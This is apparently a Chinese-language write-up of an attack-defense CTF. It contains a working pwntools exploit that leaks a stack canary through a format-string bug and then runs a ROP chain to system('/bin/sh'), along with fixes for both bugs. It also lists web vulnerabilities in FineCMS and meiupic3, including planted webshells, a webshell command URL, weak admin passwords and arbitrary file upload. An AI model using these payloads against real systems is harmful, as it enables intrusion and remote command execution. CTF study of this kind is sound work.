信创AWD wp

pwn

canary保护和NX保护

ida查看，存在格式化字符串漏洞和栈溢出

因此思路是泄露canary保护，然后ret2libc

gdb本地调试

发现0x7ffff7e1b780被泄露了，因此计算出canary偏移为11，输入%11$p得到

![image-20240513211218375](信创wp/image-20240513211218375.png

存在system和binsh，直接使用

由于是64位程序，还需要ret、和pop rdi，ROPgadget查找

exp

from pwn import *
context.log_level='debug'
p=remote('4.2.1.3',9999)
'''
0x0000000000400903 : pop rdi ; ret
0x00000000004005e9 : ret
'''
binsh=0x400928
system=0x400630
ret=0x4005e9
pop_rdi=0x400903

p1 = "%{offset}$p\n".format(offset = 11)
print(p1)
p.sendafter(b"[type 'quit' to quit] prompt> ",p1)
leak_info = p.recvuntil("\n",drop = True)
canary = int(leak_info,16)
log.success("canary:" + hex(canary))
p2 = b'a'*(0x20-8)+p64(canary)+b'a'*8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendafter(b"[type 'quit' to quit] prompt> ",p2)
p.interactive()

fix

栈溢出

0x50改为0x20

格式化字符串

存在puts，将printf改为puts

Web

finecms

漏洞1：一句话木马

D盾扫出来个一句话木马

漏洞2：CSRF

网站为FineCMS v5.4.0

搜索得到

漏洞3:弱密码

网站后台管理员账户（admin）存在弱密码 admin

漏洞4：后台getshell

参考：FineCMS v5.4.1 后台getshell - _昏鸦 - 博客园 (cnblogs.com)

漏洞5：信息泄露

网站下有phpinfo.php

meiupic3

漏洞1：一句话木马

扫出来个木马

但是中间有函数报错，无法执行到木马处，估计出题人也没验证

修改下代码，验证

http://192.168.232.133:7000//templates/default/common/404.php?a=system&b=ls

漏洞2：后台相册任意上传文件

抓包修改上传后的名字为2.php,

访问/data/cache/tmp/2.php

漏洞3:弱密码

网站后台管理员账户（admin）存在弱密码 admin

漏洞4：后台模板修改

由于只有个别子目录存在写权限，当某php存在写权限，后台可修改代码getshell